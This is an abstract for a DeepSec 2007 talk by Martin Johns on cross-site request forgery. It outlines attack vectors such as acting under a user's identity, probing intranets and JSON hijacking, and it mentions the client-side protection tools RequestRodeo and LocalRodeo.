The Three Faces of CSRF presented at DeepSec 2007

by Martin Johns,

Summary : Even though Cross Site Request Forgery (CSRF) vulnerabilities have made it into the OWASP Top 10 [1], this vulnerability class is still often ignored and almost always belittled. While in 2006 alone 1282 XSS vulnerabilities were collected by the CWE project, only 5 (!) CSRF issues were recorded in the same timeframe [2]. This talk will discuss the various existing CSRF attack vectors and exemplify the issues with real world examples: * Executing arbitrary actions on the web application using the attacked user's identity and authentication context * Subverting the company's firewall and exploring the intranet * Leaking sensitive informations via hijacking JSON data Furthermore, we will demonstrate how a simple CSRF exploit can be created semi-automatically in less the 5 minutes. The last quarter of the talk will be devoted to a brief overview on our client side CSRF protection tools RequestRodeo [3] and LocalRodeo [4]. [1] OWASP Top 10: http://www.owasp.org/index.php/Top_10_2007 [2] Vulnerability Type Distributions in CVE: http://cwe.mitre.org/documents/vuln-trends/index.html [3] RequestRodeo: http://www.nongnu.org/requestrodeo/ [4] LocalRodeo: http://databasement.net/labs/localrodeo/